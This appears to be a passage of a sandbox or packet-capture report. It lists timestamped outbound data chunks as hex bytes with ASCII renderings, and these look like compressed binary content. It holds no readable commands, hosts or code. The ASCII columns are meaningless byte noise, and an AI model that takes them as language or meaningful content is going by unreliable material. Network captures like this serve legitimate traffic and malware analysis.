                                                                                                      2023-09-07 14:42:19 UTC304OUTData Raw: d0 87 c2 af 7d 24 db 6f 0b 3f b9 ff b5 bc 01 0f f4 6b 7c e4 f6 17 f3 e8 bf f9 0d 3e f4 a1 4f e3 1b 5f ef a5 78 c2 27 ef f3 b5 6f c0 15 4f fb 46 5e ef a5 7e 82 b7 fb 9b df e0 43 1f ca 8b e8 d7 f8 c8 ed b7 85 9f dc e7 6b df 80 e7 e3 d7 f8 c8 ed b7 85 9f dc e7 6b df 80 2b 9e f6 8d bc de 4b fd 04 6f f7 37 bf c1 87 3e 94 67 7a 1a df f8 7a 2f c5 4f bc dd df f0 1b 1f fa 50 9e e5 d7 3e 92 ed b7 85 9f dc ff 5a de 80 fb fd 1a 1f b9 fd b6 f0 93 fb 7c ed 1b f0 c2 3d ed 1b 79 bd 97 7a 02 9f bc ff b5 bc 01 cf c7 d3 be 91 d7 7b a9 27 f0 c9 fb 5f cb 1b 3c ed 1b 79 bd 97 fa 09 de ee 6f 7e 83 0f 7d 28 cf f4 34 be f1 f5 5e 8a 9f 78 bb bf e1 37 3e f4 a1 3c 7f bf c6 47 6e bf 2d fc e4 3e 5f fb 06 5c f1 6b 1f c9 f6 db c2 4f ee 7f 2d 6f c0 fd 7e 8d 8f dc 7e 5b f8 c9 7d be f6 0d
                                                                                                      Data Ascii: }$o?k|>O_x'oOF^~Ckk+Ko7>gzz/OP>Z|=yz{'_<yo~}(4^x7><Gn->_\kO-o~~[}
                                                                                                      2023-09-07 14:42:19 UTC320OUTData Raw: 78 36 1b 24 24 e1 4c 90 90 c4 03 e5 9f 7e 2b 87 87 87 d8 e6 aa ab ae ba ea aa ab ae ba ea aa ab 5e 14 92 d8 d8 d8 a0 fc 94 78 41 2c fe 75 c4 73 31 ff 1a 92 78 20 d3 b8 4c e2 32 71 85 c4 15 e6 59 24 10 cf 49 e2 81 14 e6 32 89 e7 4b 09 80 b9 22 9c 00 58 5c 26 89 14 97 85 21 10 91 49 0f 6c 04 2c c2 6c 16 b1 d1 89 93 4c dc d4 06 1e b9 05 2f f7 e0 6d ae 3d 01 77 1c c2 af fc d5 2e 3f ff b7 e7 b9 e3 b0 67 3d 06 8c 89 c6 09 b9 e1 14 ce 89 ea 91 8d dc e3 b1 d7 74 bc e3 eb bd 18 6f f1 d2 1b 6c 14 f8 fb b3 13 7f 74 eb 39 6e 5d f7 1c d6 2d 12 d1 04 10 84 41 e6 99 0a 06 6c a3 30 cf 8f 6d 24 f1 c2 38 04 80 6d ee 67 9b b0 b9 9f 24 02 f1 40 92 90 84 69 48 22 10 92 00 b0 4d 90 48 42 e6 32 c9 04 57 48 02 12 a9 e0 14 21 1e c0 04 42 82 2a c8 04 61 24 01 20 41 00 12 97 d9 89
                                                                                                      Data Ascii: x6$$L~+^xA,us1x L2qY$I2K"X\&!Il,lL/m=w.?g=tolt9n]-Al0m$8mg$@iH"MHB2WH!B*a$ A
                                                                                                      2023-09-07 14:42:19 UTC336OUTData Raw: 25 32 97 49 02 20 0c 92 40 89 24 00 24 21 43 18 24 2e 53 70 99 0c 36 48 06 20 0c 92 00 50 18 99 67 91 0c 80 24 42 02 a0 00 60 c4 03 99 30 48 42 12 12 a4 78 0e 61 2e 13 57 48 5c 16 5c 11 e6 32 1b 50 22 09 49 04 46 12 00 b6 b1 0d 40 91 90 78 16 19 24 f1 dc 24 2e 13 20 81 6d 00 0a 02 c0 61 9e 5b 91 89 34 81 10 81 04 0a b0 12 85 49 20 5d b8 6f 7f e4 2f ef b8 97 c5 d6 29 fe e4 57 7e 9f bf fd d3 bf 20 c7 11 da 88 78 cc db 98 e7 2b 80 04 15 20 81 00 12 6c 1e 48 4e 00 6c 73 99 cd f3 90 20 04 12 10 5c 11 5c 66 01 a0 e0 32 65 03 c0 36 97 a5 b1 40 12 00 56 80 04 16 97 c9 bc 50 12 00 92 00 90 c4 fd 24 71 3f db dc cf 36 96 00 10 85 e7 26 89 14 40 20 09 03 92 00 10 60 1b db 3c 3f 61 b0 0d 80 dd 40 09 36 d8 5c e6 c6 65 36 00 32 97 59 3c 97 e0 8a e4 39 48 fc eb 04 00 92
                                                                                                      Data Ascii: %2I @$$!C$.Sp6H Pg$B`0HBxa.WH\\2P"IF@x$$. ma[4I ]o/)W~ x+ lHNls \\f2e6@VP$q?6&@ `<?a@6\e62Y<9H
                                                                                                      2023-09-07 14:42:19 UTC352OUTData Raw: f2 7c a9 f0 22 b1 b8 9f 24 9e 1f db fc ab c9 bc 50 36 2f 94 c4 f3 e3 3f ff 0e 0e 0f 0f b1 cd 55 57 5d 75 d5 55 57 5d 75 d5 55 57 bd 28 24 b1 b1 b1 41 f9 29 81 92 7f 0b 49 bc 30 c9 7f 0f 49 00 58 fc 9b 48 5c e6 e0 b2 30 20 03 49 0a 70 80 80 10 98 cb 24 88 04 31 d1 85 38 e1 43 1e d3 0f bc ce 43 8e f3 6a 37 55 ba 80 5f f8 ab 81 9f f9 bd 27 70 db 45 73 30 16 d4 12 b7 89 42 a3 b5 06 aa 84 92 7e 3c e4 86 f9 92 37 7f 99 5b 78 c7 37 78 71 1e 72 0d dc 71 08 bf f6 94 43 1e bf 37 72 a4 39 eb 52 48 17 2c 08 27 26 98 14 48 d0 1b 82 89 29 03 00 49 3c 37 db 48 e2 85 29 32 0f 94 02 49 40 22 89 30 97 85 04 40 41 00 04 2f 9c 00 89 67 09 f3 5c 0c 40 8a cb c2 5c 26 89 07 12 09 40 18 24 f1 dc 14 06 20 10 0f 64 1b 00 91 48 22 0c 92 00 90 c4 fd 8a 04 40 70 bf 04 20 10 92 40 89
                                                                                                      Data Ascii: |"$P6/?UW]uUW]uUW($A)I0IXH\0 Ip$18CCj7U_'pEs0B~<7[x7xqrqC7r9RH,'&H)I<7H)2I@"0@A/g\@\&@$ dH"@p @
                                                                                                      2023-09-07 14:42:19 UTC368OUTData Raw: ee 17 3c 93 cc f3 13 e6 39 48 42 02 61 1e 48 12 12 28 0d 80 48 24 01 20 09 00 49 84 0c 40 98 cb 2a 06 20 10 00 25 84 04 85 67 52 02 20 09 49 c8 60 1b 00 49 48 c6 36 00 92 08 0c 80 24 ae 48 24 71 bf 30 97 99 00 a0 38 51 34 02 93 45 1c 66 e5 dc fe 8a fd b1 72 d7 d9 4b fc e8 0f fd 34 17 ef 3b 87 8f d6 14 40 ba e9 55 cc 73 10 0f 64 9b fb 49 02 07 f7 b3 78 a6 e4 59 24 2e b3 79 20 f1 9c 24 01 60 1b 49 3c 5f 0e 5e 98 14 20 ae 90 b8 9f 24 ee 67 9b 17 ca c1 0b a5 e0 59 24 00 90 f8 8f 13 3c 07 9b 2b 92 ff 70 12 cf 22 01 20 15 1e c8 e2 39 25 cf 26 41 08 24 b0 c1 06 00 1b cc 15 12 cf 29 b8 4c 3c 7f 12 90 3c 8b 0a 00 92 78 be 1c 00 48 c2 02 db a0 40 08 8b 2b 24 ee 27 09 49 00 18 f1 40 16 cf e6 00 40 12 57 04 00 92 b0 0d 00 24 00 92 30 0d 00 db 5c 66 f3 1c 0c 92 90 78
                                                                                                      Data Ascii: <9HBaH(H$ I@* %gR I`IH6$H$q08Q4EfrK4;@UsdIxY$.y $`I<_^ $gY$<+p" 9%&A$)L<<xH@+$'I@@W$0\fx
                                                                                                      2023-09-07 14:42:19 UTC384OUTData Raw: e6 7e e6 b9 a8 70 3f 49 58 20 09 00 08 24 81 83 e7 f6 e8 57 7b 6f fe 23 fc c3 8f 7c 20 ff 91 8e dd f4 92 ec e5 06 2f 2a 29 00 b0 78 be 24 f1 ef 21 f3 42 d9 e6 7e 92 78 5e e6 45 65 9b fb d9 06 40 12 b6 f9 97 48 e2 7e b6 01 90 84 5b 72 3f 49 58 3c 07 49 bc 70 e2 f9 c9 3b ff 90 c3 c3 43 6c 73 d5 55 57 5d 75 d5 55 57 5d 75 d5 55 2f 0a 49 6c 6c 6c 10 ef f9 53 40 00 09 04 c8 40 00 09 36 2f 32 89 e7 61 83 c4 73 90 40 5c 21 81 cd f3 a5 02 a5 f2 2c 36 cf c1 06 89 cb 24 9e 83 cd 15 01 e6 0a 71 85 cd b3 d8 80 c1 80 12 0c 90 dc 2f 5a 20 83 c2 5c 91 58 89 49 0c 44 01 bb 81 1b 64 52 64 66 05 e6 b3 ca ac 76 6c 6f 1f a3 0d 23 d3 e1 3e 7b 43 e3 3c 0b 70 0f 23 44 36 42 03 a4 89 26 6c 43 49 1a 23 76 83 1c e9 34 50 da 48 a4 89 66 42 02 12 0b 12 70 11 4d 90 02 db a8 25 61 90
                                                                                                      Data Ascii: ~p?IX $W{o#| /*)x$!B~x^Ee@H~[r?IX<Ip;ClsUW]uUW]uU/IlllS@@6/2as@\!,6$q/Z \XIDdRdfvlo#>{C<p#D6B&lCI#v4PHfBpM%a
                                                                                                      2023-09-07 14:42:19 UTC400OUTData Raw: 44 88 e7 10 32 00 92 00 08 83 04 d1 b8 4c 61 00 64 90 04 18 80 12 e2 0a 23 89 30 97 49 80 8c 6d 20 01 90 44 20 00 02 90 c4 b3 19 49 a4 b8 4c 12 e1 44 d9 08 43 75 87 2b b4 3a 92 45 94 56 19 80 fb 8e 1a b7 df 7d 0f 37 9c b9 9e 3f f8 fd 3f e7 17 7f f9 0f 58 1e 4e 30 36 68 89 e2 a6 d7 b0 6d 1e 48 12 b6 79 6e 92 78 20 49 a4 c0 e2 05 5a cc 82 6f fe b8 97 e4 3d df f8 66 c0 e0 e4 69 f7 2c 79 e7 cf bf 83 b7 79 a3 d7 e4 6d de e8 35 78 f0 cd d7 f3 b4 df f9 03 e2 e7 7f 92 8d 5f fa 19 ae db e8 c8 77 7f 5f d8 dc e4 29 bf f6 1b 3c fc 87 7f 02 80 5f fc b5 df e6 61 0f be 99 9b 6e b8 8e cd cd 4d 9e db 1f fe f9 df f2 7a ef fe 89 80 40 01 12 20 2e 73 00 20 89 07 b2 f8 57 93 c4 fd 2c 9e 45 12 cf 62 f1 a2 d8 f6 2e 97 9e f2 07 fc 77 3a f6 f0 57 61 af 9c e2 39 05 00 92 00 90 84
                                                                                                      Data Ascii: D2Lad#0Im D ILDCu+:EV}7??XN06hmHynx IZo=fi,yym5x_w_)<_anMz@ .s W,Eb.w:Wa9
                                                                                                      2023-09-07 14:42:19 UTC416OUTData Raw: df 8a 5f 1c 3f 96 27 bd da 23 f8 e8 3f db 80 d2 c3 2b 7c 1e 4f fe dd 0f e7 e1 3c 85 af 79 b5 47 f0 d1 7f 08 1f f8 8b e6 5b 1e f1 b5 bc da 4b 7c 16 7f 08 7c e0 4f 5d e4 5b f8 30 f4 36 3f 08 db d7 c3 f6 0d 30 3f c6 73 08 21 09 00 51 48 40 12 cf cd 36 d8 20 f1 40 92 78 20 ab f0 fc 05 00 8a e0 8a e0 39 09 00 4b bc 50 e2 39 49 3c a7 e0 45 22 f1 fc 08 b0 cd 03 49 c2 36 cf 8f 24 9e 53 72 3f db c8 5c 96 7f fe 6d 1c 1e 1e 62 9b ab ae ba ea aa ab ae ba ea aa ab ae 7a 51 48 62 63 63 83 f8 19 fe cd 24 61 1b 00 49 00 d8 06 40 12 16 2f 5c 98 17 48 82 e0 3f 86 00 01 98 fb 49 c2 36 97 85 b8 22 b9 4c 02 25 68 44 69 3a 17 e6 a5 a7 2f d0 09 7a 60 41 b2 61 b1 59 44 67 d8 8c c6 c9 59 72 32 06 1e bc 28 3c fa 78 cf 63 b7 83 93 9b b0 04 1e b7 84 9f bb 1d 7e e5 f1 f7 f1 8c bb c4
                                                                                                      Data Ascii: _?'#?+|O<yG[K||O][06?0?s!QH@6 @x 9KP9I<E"I6$Sr?\mbzQHbcc$aI@/\H?I6"L%hDi:/z`AaYDgYr2(<xc~
                                                                                                      2023-09-07 14:42:19 UTC432OUTData Raw: 24 5e 10 db dc 4f 12 cf 62 01 20 89 07 4a f1 4c c1 0b 23 89 e7 c7 36 00 92 78 20 49 00 a4 05 80 24 00 24 01 20 09 80 86 78 61 24 01 60 9b e7 47 12 00 b6 79 20 49 00 18 21 09 49 00 d8 06 c0 e2 32 51 78 7e 2c ae 08 f1 2c 12 cf e2 e0 81 24 f1 2f b1 0d 6e 3c 8b 8d 22 00 30 c1 65 51 40 02 c4 73 90 90 04 04 0f e4 4c 2e 73 72 99 cc 15 c9 15 c1 f3 e3 3f ff 0e 0e 0f 0f b1 cd 55 57 5d 75 d5 55 57 5d 75 d5 55 57 bd 28 24 b1 b1 b1 41 f9 29 81 92 e7 c7 12 2f 94 92 67 91 78 20 49 18 73 99 c4 73 32 97 49 3c 3f 0a 73 99 03 00 8b 17 4e 5c 21 2e 93 c0 e2 8a 00 0c 12 28 c1 06 8b 2b c2 5c 91 00 84 a1 4a 54 05 95 46 47 32 33 6c 2a 98 87 a9 11 94 2a 8a 60 0e 6c a4 d9 0c b3 a1 91 63 25 39 39 37 d7 ce 82 07 6d ce 79 c8 31 71 fd cc cc 3a 71 08 3c 65 80 5f bf b5 f1 8b 8f 3f c7 e3
                                                                                                      Data Ascii: $^Ob JL#6x I$$ xa$`Gy I!I2Qx~,,$/n<"0eQ@sL.sr?UW]uUW]uUW($A)/gx Iss2I<?sN\!.(+\JTFG23l**`lc%997my1q:q<e_?
                                                                                                      2023-09-07 14:42:19 UTC448OUTData Raw: 49 18 4c 90 11 dc af e4 44 df 1a bd 92 45 ed d9 2a 70 ba 2f 5c 13 23 37 77 6b 5e f2 44 cf 2b 5c d3 73 ed 36 8c c0 ef dc 6e be f7 6f ee e6 cf ef 1c 39 5c 6e 31 ad 04 c3 80 72 a2 36 e3 1c 10 23 73 8e b8 61 63 e0 dd 5e f7 c5 79 b7 57 d9 a2 03 fe fe 2c fc e9 6d 17 79 fa 61 65 3f 16 ac 15 34 41 c8 dc cf 04 16 97 c9 3c 07 db 3c 90 24 00 02 61 81 cc b3 d8 e6 7e c1 0b 93 04 02 25 61 90 84 0c 92 b8 9f 05 92 00 f3 40 32 97 45 04 28 01 80 44 06 49 dc 2f 1c 5c a6 44 12 81 90 44 01 90 a9 21 6c 20 c1 34 c2 10 21 8a 02 09 02 08 ae 08 f1 4c c6 36 61 90 84 48 24 01 50 c4 65 92 00 10 22 c5 65 61 2e 0b 20 78 b6 00 c4 15 61 90 40 82 10 d8 00 09 04 92 79 6e 45 e6 7e 92 08 84 02 04 28 40 13 48 26 24 24 00 03 10 24 b6 09 40 61 02 21 09 c9 48 a2 48 48 46 98 82 00 10 09 00 69 0a
                                                                                                      Data Ascii: ILDE*p/\#7wk^D+\s6no9\n1r6#sac^yW,myae?4A<<$a~%a@2E(DI/\DD!l 4!L6aH$Pe"ea. xa@ynE~(@H&$$$@a!HHHFi
                                                                                                      2023-09-07 14:42:19 UTC464OUTData Raw: 22 89 e4 0a 85 01 90 04 80 b2 01 20 ae b0 0d 24 a8 41 18 51 08 09 51 90 44 10 00 04 00 06 40 24 00 05 01 49 2a 68 0a 7a 89 3a 25 3d 20 19 d7 60 a8 e2 e2 d1 c8 5d 17 f6 38 76 ec 14 7b 17 8e f8 e5 9f f9 79 0e ee b9 00 13 28 1b 00 e2 41 af 69 1e 40 06 db 00 60 f3 2c 36 97 99 cb 24 01 20 73 99 c5 65 16 f8 cf de 07 9c 40 82 0d 24 38 c1 09 0a 88 0d ce 3e e3 0f 89 10 a1 20 4a 80 44 28 50 88 50 a0 08 14 81 24 42 01 11 48 81 22 90 02 45 80 82 78 f5 5f e3 79 d8 3c 8b c4 03 49 e2 7e 92 30 81 c5 bf 43 f0 af 26 71 bf 6f f8 84 b7 e3 03 3f f0 03 98 a6 c6 03 7d c2 2f 9f e7 eb ff f8 12 00 ef f1 d2 5b 7c eb 5b 9d e1 7e e6 5f f6 81 3f 73 96 ef ff eb 03 00 3e ec 95 76 f8 d2 37 3a c9 03 75 5d e5 4b bf ec cb f9 f4 6f fb 0d 9e 83 cd 73 90 78 6e 92 b8 9f 09 1e 48 12 0f 64 9b 17
                                                                                                      Data Ascii: " $AQQD@$I*hz:%= `]8v{y(Ai@`,6$ se@$8> JD(PP$BH"Ex_y<I~0C&qo?}/[|[~_?s>v7:u]KosxnHd
                                                                                                      2023-09-07 14:42:19 UTC480OUTData Raw: 23 48 60 a1 5a 30 03 8b 3a 71 ad 8e 78 c5 93 c1 3b 3d fc 04 2f 71 5d 90 c0 9f df 03 df f3 c7 e7 f8 8b 3b 97 1c 1c 8a 71 00 af 1b 38 90 02 e7 00 0c cc e2 80 07 ed 4c bc e7 1b bc 24 ef f0 d2 0b 04 fc c9 59 f8 e5 27 9f e7 4f 0e e1 6e 6d b0 72 4f 46 41 36 90 dc 2f 32 b0 a0 09 08 20 f9 8f 61 f3 1c 24 00 24 f1 a2 08 92 40 08 90 84 79 a6 e0 32 db e0 86 0c 45 a2 28 90 84 81 06 d8 10 06 94 00 c8 60 1b a5 81 44 80 24 00 22 a0 28 28 82 c8 46 c1 00 14 84 64 00 44 52 10 21 21 41 10 80 09 40 12 81 e8 04 65 68 c8 20 89 88 40 12 44 01 a0 d9 74 9d b0 c0 06 8b cb 6c b0 21 81 66 48 ae 48 20 13 a6 34 b6 68 4e a6 66 6c 33 a5 99 d2 64 26 d9 60 72 62 0b 9a 71 4b 32 21 1b d8 22 33 c9 26 6c 63 0b 5b 90 02 1b 10 d8 20 71 59 36 30 57 d8 00 60 81 cd 65 0e ee 27 83 d2 00 c8 81 95 38
                                                                                                      Data Ascii: #H`Z0:qx;=/q];q8L$Y'OnmrOFA6/2 a$$@y2E(`D$"((FdDR!!A@eh @Dtl!fHH 4hNfl3d&`rbqK2!"3&lc[ qY60W`e'8
                                                                                                      2023-09-07 14:42:19 UTC496OUTData Raw: 58 ec f3 4e af f7 18 de f9 95 8e 93 c0 ef de 31 f1 4b 8f bb 8b c7 1f ce d8 ad db 1c b9 c7 04 05 41 4b a2 41 26 d8 a2 d9 d8 46 36 a4 90 c1 36 99 89 d2 64 26 64 22 03 69 6c 43 1a 32 c1 06 1b 0c d8 d0 b8 c2 80 0d 00 36 98 2b 24 2e b3 81 04 02 48 e4 00 12 80 e0 79 25 ff 32 0b 08 f1 7c 49 5c 66 f3 fc 25 97 65 e1 05 b2 41 e2 85 92 78 7e c4 f3 27 89 07 b2 04 80 6d 9e 2f 01 12 00 92 78 1e 11 3c 3f 92 00 48 fe e7 91 c4 fd ac e0 b9 49 e2 7e 92 78 81 1c a4 02 24 54 c0 1e e8 10 e1 35 1b 25 79 c8 e9 ca ab 3d 62 83 07 5f db 71 cf 79 f8 a1 1f fa 45 ee be 63 1f b7 c0 e3 80 a7 86 b8 fe 95 0c 20 09 db 60 f3 2c 12 cf 4d 12 cf 21 82 17 c6 36 2f 0a 49 00 48 e2 81 92 e0 85 12 cf c9 e6 f9 92 40 e2 3f 9c 03 00 49 d8 e6 81 24 61 cc b3 48 3c af e0 3f 46 72 99 1b 2f 94 83 2b 02 00
                                                                                                      Data Ascii: XN1KAKA&F66d&d"ilC26+$.Hy%2|I\f%eAx~'m/x<?HI~x$T5%y=b_qyEc `,M!6/IH@?I$aH<?Fr/+
                                                                                                      2023-09-07 14:42:19 UTC512OUTData Raw: db 3c 37 49 3c 8b 83 7f 0d 49 3c 50 2a 79 61 a4 02 80 c5 7f a8 a7 ec fd 29 b7 e4 8a 7c a3 37 a7 7d d7 8f f0 9f a9 7c c5 17 10 5f f1 85 5c 52 e5 f5 37 5f 9a bf 29 5b 3c 4b 88 e7 21 71 3f 49 d8 06 00 9b 67 91 b8 22 b8 cc e6 df 44 e2 59 24 00 24 f1 40 b6 01 f8 81 cf 7b 6f de f9 9d df 99 17 c6 3c 17 73 85 00 03 18 10 00 60 00 22 82 1f fe e1 1f e6 55 5f f5 55 f9 d9 5f f8 25 be f4 7b 7e 9d 3b ee db e5 79 48 00 20 01 20 09 67 f2 2c 12 00 92 b0 0d 36 48 bc 30 52 e1 81 2c 9e 83 24 2e b3 00 b0 f8 d7 91 b8 cc e6 45 26 01 20 09 5b 3c 07 89 e7 a0 e0 59 24 5e 20 15 9e 83 cd 65 12 cf 4f 98 cb 52 3c 8b 24 0c 48 c2 e2 99 c4 f3 e3 bf fd 61 0e 0e 0e 00 90 c4 55 57 5d 75 d5 55 57 5d 75 d5 55 57 bd 30 b6 01 d8 da da 22 3e f5 c9 38 c4 65 36 97 39 c0 46 88 17 44 12 cf 8f 24 ee
                                                                                                      Data Ascii: <7I<I<P*ya)|7}|_\R7_)[<K!q?Ig"DY$$@{o<s`"U_U_%{~;yH g,6H0R,$.E& [<Y$^ eOR<$HaUW]uUW]uUW0">8e69FD$
                                                                                                      2023-09-07 14:42:19 UTC528OUTData Raw: be 24 5e 28 9b e7 60 83 04 12 92 b0 c5 65 02 24 9e 87 83 cb 42 bc 50 12 cf 41 80 c4 fd 24 f1 fc 98 e0 39 48 5c 26 ae 90 78 a1 04 48 3c 37 49 3c 90 25 1e 48 12 00 16 2f 94 24 6c f3 1c 6c 9e c5 81 24 ee 67 f1 9c 6c 90 b8 9f 24 00 cc 0b 20 f1 1c c4 b3 49 3c 90 24 2c 71 3f 49 dc cf 5c a1 08 00 8c 41 42 12 00 16 57 48 3c 8b 04 04 92 00 b0 40 12 92 90 84 43 e0 c0 36 00 92 30 0d 24 00 24 01 90 e2 59 24 61 f1 2c 92 00 30 57 48 02 40 e2 b2 94 01 90 04 80 c5 65 12 97 59 3c 9b 78 16 89 cb 2c 9e 53 18 00 49 00 58 c9 65 12 97 89 2b 24 9e 83 12 24 9e cd 20 f1 2c 02 94 20 01 c9 fd 24 f1 40 22 91 44 95 88 02 45 41 29 a2 06 14 60 13 e8 01 19 84 a1 4d 90 a6 02 21 d3 15 d1 87 e8 14 f4 21 fa 10 9d a0 0f 51 80 62 28 09 0a 23 99 08 88 22 e4 04 25 b5 74 34 9b 4c 70 42 4b 31 19
                                                                                                      Data Ascii: $^(`e$BPA$9H\&xH<7I<%H/$ll$gl$ I<$,q?I\ABWH<@C60$$Y$a,0WH@eY<x,SIXe+$$ , $@"DEA)`M!!Qb(#"%t4LpBK1
                                                                                                      2023-09-07 14:42:19 UTC544OUTData Raw: fe 25 af f4 4a af c4 d7 7d dd d7 f1 8a af f8 8a bc d2 2b bd 12 5f f8 85 5f c8 a7 7e ea a7 f2 29 9f f2 29 bc f5 5b bf 35 df fb bd df cb f7 7e ef f7 f2 e1 1f fe e1 7c d1 17 7d 11 7f f2 27 7f c2 8b aa bb 61 13 80 fe e4 eb f3 a2 90 c4 03 99 67 52 80 c4 0b a4 e0 39 48 3c 8b cd b3 48 00 48 e2 b9 7d dd 47 be 09 1f f4 81 1f c4 38 4d dc 6f e3 73 9e ce 7f 86 c3 cf 7c 30 f7 eb ba ca 97 7c c9 97 f2 19 df f5 fb 48 42 12 92 48 81 09 00 24 21 89 fb 09 b0 8d d2 40 82 0d 80 6d ee 67 9b 88 c0 36 00 b6 b1 cd 65 69 c0 dc 2f 00 bb f1 dc 6c 83 12 0c 08 30 20 c0 80 40 08 0b 64 b0 40 06 0b 64 80 e0 85 4b 9e 83 12 1c a0 e4 b9 c9 60 81 cc 73 b0 cd fd 24 71 3f 8b 2b 52 dc 4f 12 cf 4d 12 0f 64 9b fb 19 b0 f8 77 0a 5e 28 89 cb 1c 00 48 e2 81 8c 41 e2 59 6c 90 90 04 80 6d 2e 13 20 f1
                                                                                                      Data Ascii: %J}+__~))[5~|}'agR9H<HH}G8Mos|0|HBH$!@mg6ei/l0 @d@dK`s$q?+ROMdw^(HAYlm.
                                                                                                      2023-09-07 14:42:19 UTC560OUTData Raw: 04 92 51 1a 00 db 40 22 83 05 76 e3 39 d8 40 02 80 13 a5 b1 1b d8 e0 06 69 50 72 3f 99 cb 2c c0 06 f3 5c 0c 80 b8 c2 36 cf 29 79 00 c4 f5 af 64 9e 9b 1b e4 04 d9 10 8d 67 51 85 28 3c 90 25 50 05 00 4f c8 0d b2 81 3a 88 8a c5 15 39 71 59 74 3c 8b 27 68 23 48 10 15 45 85 a8 48 82 9c c0 0d b7 91 67 51 45 3c 93 4d 7a e2 59 a2 82 2a 2a 15 a2 02 40 4e 90 13 64 03 80 28 10 15 22 80 00 92 e0 d9 6c f3 dc 6c 03 60 9b cb 6c 1e 48 d9 80 01 00 1b 50 e1 32 37 c8 09 72 e2 59 54 20 2a 97 49 00 88 c0 2a 00 90 13 cf 12 15 08 90 c0 0d 72 82 6c e0 89 e7 11 01 51 41 05 00 dc 20 27 70 03 15 88 0a 2a 5c e6 06 39 81 1b 00 4a f1 2c 51 41 85 67 71 83 9c 78 7e 24 01 e0 a8 b8 14 50 85 28 00 48 e2 7e b6 79 a1 32 c1 13 cf a2 ca 65 9e 20 27 c8 c6 65 51 20 2a a8 72 99 27 c8 09 32 79 20
                                                                                                      Data Ascii: Q@"v9@iPr?,\6)ydgQ(<%PO:9qYt<'h#HEHgQE<MzY**@Nd("ll`lHP27rYT *I*rlQA 'p*\9J,QAgqx~$P(H~y2e 'eQ *r'2y
                                                                                                      2023-09-07 14:42:19 UTC576OUTData Raw: 21 09 49 34 c4 bf 44 12 f7 b3 cd 73 0a 40 00 20 01 20 89 fb 49 02 c0 36 ff 12 49 3c 90 24 6c f3 fc 48 02 c0 02 db bc 20 b6 79 0e 36 cf 21 c5 0b 25 f1 2c 12 00 92 78 20 8b 7f 3b 9b cb 24 fe 55 24 ae 08 1e 48 12 2f 0a 49 00 64 26 48 3c 5f 36 48 3c 90 24 1e c8 0a 9e 2f 89 17 89 c5 0b 65 73 99 c4 03 49 02 c0 e2 85 92 0a 2f 8c 6d 90 b8 9f 24 00 24 f1 40 29 9e cd e6 59 54 f8 d7 90 c4 03 99 e0 81 24 f1 40 92 78 61 1c 02 c0 16 0f 24 09 00 49 00 38 79 16 db 3c 8b 78 e1 24 9e 9b 24 9e 45 05 00 db 3c 90 24 5e 18 db dc 4f 12 cf 2b 00 b0 78 fe 1c 5c 16 e6 45 26 f1 dc a4 82 c5 b3 49 5c 66 f1 82 48 e2 d9 02 8b 17 4a 12 e6 01 6c 90 b8 22 78 be 42 20 01 c1 fd 24 71 3f 49 00 a4 cd 73 b0 79 a1 24 1e 48 2a d8 e6 79 88 2b 24 2e b3 40 e2 79 44 01 40 12 00 06 24 71 3f 5b 00 48
                                                                                                      Data Ascii: !I4Ds@ I6I<$lH y6!%,x ;$U$H/Id&H<_6H<$/esI/m$$@)YT$@xa$I8y<x$$E<$^O+x\E&I\fHJl"xB $q?Isy$H*y+$.@yD@$q?[H
                                                                                                      2023-09-07 14:42:19 UTC592OUTData Raw: e7 60 03 89 0c b6 41 c9 73 c8 c6 03 c9 e6 7e b6 c1 06 03 24 d8 20 03 00 09 04 38 79 16 1b 99 2b 94 38 05 4a e4 00 92 fb 85 c1 36 0f 24 12 db dc 4f 4e 1e 28 01 db 3c 8b 12 00 a5 01 b0 1b 92 10 60 1b 48 6c 43 1a 00 6c 70 02 09 00 36 00 d8 00 40 42 1a 48 c4 15 b6 91 c1 36 b8 11 12 b6 91 c1 4e 6c f3 2c 4a ee 17 06 bb f1 dc 6c 71 45 f2 2c 36 90 00 48 e2 0a 03 60 9b 07 12 2f 9c 6d fe 3d c2 3c 8b 6d 00 6c 83 cd 65 4e 9e 83 12 80 30 97 d9 e6 39 25 cf 8f 6d 00 c4 b3 d9 06 37 9e 83 79 20 c4 99 97 36 0f 64 83 84 24 24 61 1b 00 db 3c 3f 52 e1 5f 43 12 0f 94 e2 0a 9b 17 99 c4 bf 89 cd f3 90 78 81 6c fe dd 24 2e 13 57 48 fc 97 72 f0 9f 49 12 cf 8f c5 33 89 ff 0a 92 f8 f7 b2 cd 8b 42 12 cf e2 e0 7e 92 48 71 85 b8 42 e2 81 64 9e 83 c5 7f 0e 07 97 89 e7 25 f1 1f 46 85 e7
                                                                                                      Data Ascii: `As~$ 8y+8J6$ON(<`HlClp6@BH6Nl,JlqE,6H`/m=<mleN09%m7y 6d$$a<?R_Cxl$.WHrI3B~HqBd%F
                                                                                                      2023-09-07 14:42:19 UTC608OUTData Raw: f3 2c 12 cf 8f 24 9e 45 85 17 95 6d 9e 87 b8 42 e2 f9 51 04 00 92 00 90 c4 03 49 02 c0 08 db 3c 5b 00 90 99 5c a6 c2 f3 65 f1 7c 49 3c 07 01 12 00 48 3c 0f 09 00 a9 00 e0 10 cf 43 02 c4 03 45 04 b6 01 b0 0d 04 48 00 48 02 82 07 32 01 12 cf 4d 12 00 16 2f 9c b8 42 e2 32 8b 2b 02 24 9e 87 78 a6 c2 8b 42 12 0f 24 09 00 db dc cf 36 d8 3c 37 45 00 e0 4c 9e 45 e2 f9 91 04 80 a3 f0 c2 48 c2 36 f7 93 04 80 24 2c 70 f2 22 93 c4 03 59 20 15 5e 18 49 d8 e6 7e b6 79 16 1b 64 1e 48 06 db 20 73 59 9a 2b 12 80 30 cf c9 0d 00 db 5c 91 00 d8 06 40 36 f7 b3 cd b3 19 00 99 e7 60 9b 07 2a 32 f7 b3 0d 80 6d ee 67 37 00 44 02 60 1b 00 61 6c 83 0d 80 9c dc cf 36 f7 13 09 80 d2 00 d8 e6 81 ec c6 65 36 97 d9 3c 8b 04 36 cf 62 83 93 07 12 c6 36 cf e2 c6 03 85 13 00 db 3c 90 6d ee
                                                                                                      Data Ascii: ,$EmBQI<[\e|I<H<CEHH2M/B2+$xB$6<7ELEH6$,p"Y ^I~ydH sY+0\@6`*2mg7D`al6e6<6b6<m
